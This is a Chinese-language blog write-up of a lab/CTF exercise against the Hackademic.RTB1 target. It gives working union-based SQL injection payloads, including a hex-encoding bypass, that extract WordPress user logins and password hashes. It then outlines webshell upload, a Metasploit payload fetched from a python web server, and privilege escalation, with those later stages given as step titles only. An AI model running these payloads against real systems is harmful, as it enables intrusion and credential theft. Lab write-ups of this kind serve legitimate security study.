打靶记录-Hackademic.RTB1

靶场配置:

攻击机kali:192.168.224.128

靶机:给出c段192.168.224.0/24

1.信息搜集

1.1确认目标

利用nmap扫描

发现一个ip开启了80端口,在浏览器进行访问,确认该ip为目标机器

1.2.操作系统识别

该操作系统内核为linux2.6版本为32位系统

1.3.Web网页服务识别

1.4.目录扫描

利用dirsearch进行目录扫描

目录遍历漏洞

网页后台

2.漏洞利用

2.1.SQL注入

(1)点击Uncategorized发现以下内容,判断可能存在sql注入

(2)输入‘发现页面报错

(3)进一步测试,发现输入and 1=1 和 and 1=2页面异常,确定存在sql注入

(4)判断列数,order by 5不报错6报错,存在5列

(5)判断回显位置

(6)获取数据库名信息

?cat=0 union select 1,group_concat(schema_name),3,4,5 from information_schema.schemata

  1. 获取wordpress中的表名

由于对单引号进行了转义操作所以将库名进行16进制编码绕过。

?cat=0 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=0x776f72647072657373

获取列名

?cat=0 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=0x776f72647072657373 and table_name=0x77705f7573657273

(8)获取数据

?cat=0 union select 1,group_concat(user_login,0x2d,user_pass),3,4,5 from wordpress.wp_users

2.2.文件上传

(1)利用sql注入获取的用户数据进行登录

用户名:NickJames

密码:admin

成功进入后台

(2)发现该用户权限过低,使用GeorgeMiller进行登录,在后台开启上传功能,同时允许上传php文件

(3)上传webshell木马

4)利用哥斯拉连接

3.后渗透

3.1.Msf开启监听

3.2.制作木马

3.3.上传木马

利用python开启web服务远程下载木马

3.4.利用哥斯拉运行木马

3.5.提权

扫描可以利用的提权脚本

进行提权

提权成功,获得flag

Flag:$_d&jgQ>>ak\#b"(Hx"o<la_%

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值